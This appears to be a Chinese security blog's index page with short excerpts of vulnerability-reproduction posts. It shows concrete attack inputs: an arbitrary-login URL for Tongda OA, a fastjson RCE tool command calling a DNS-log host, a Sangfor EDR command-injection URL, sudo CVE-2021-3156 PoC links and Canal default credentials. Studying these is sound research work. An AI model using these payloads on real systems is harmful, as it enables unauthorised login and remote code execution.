通达OA11.7 任意用户登陆

通达OA 任意用户登陆 条件需要管理员在线 http://192.168.1.22/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 访问路径,覆盖了session直接用cookie登陆...

fastjson_rce_tool

https://github.com/wyzxxz/fastjson_rce_tool java -jar fastjson_tool.jar Usage: java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp f...

深信服DER RCE 复现

https://url:9443/tool/log/c.php?strip_slashes=system&host=id 任意用户登陆 https://xxxxx:5000/ui/login.php?user=admin ...

Java 基础-傻傻分不清楚的文件操作类

为了记住那个是写入那个是读取。有时候傻傻分不清这里为了这我这个的脑瓜子记住,特意写一篇文章,也是给自己强行记住 首先是字节的两个超类 java.io.OutputStream --->输入【写】 jav...

Sudo CVE-2021-3156

https://www.o2oxy.cn/wp-content/uploads/2021/01/CVE-2021-3156_nss_poc_ubuntu.tar.gz https://haxx.in/CVE-2021-3156_nss_poc_ubuntu.tar.gz 经过测试,该POC适用于ubuntu系...

阿里巴巴Canal信息泄露漏洞 复现

"Canal" +port:"8089"  默认账号 :admin/123456 GET /api/v1/canal/config/1/0 HTTP/1.1 Host:192.168.1.71:8089 Cache-Control: max-age=0 Upgrade-Insecure...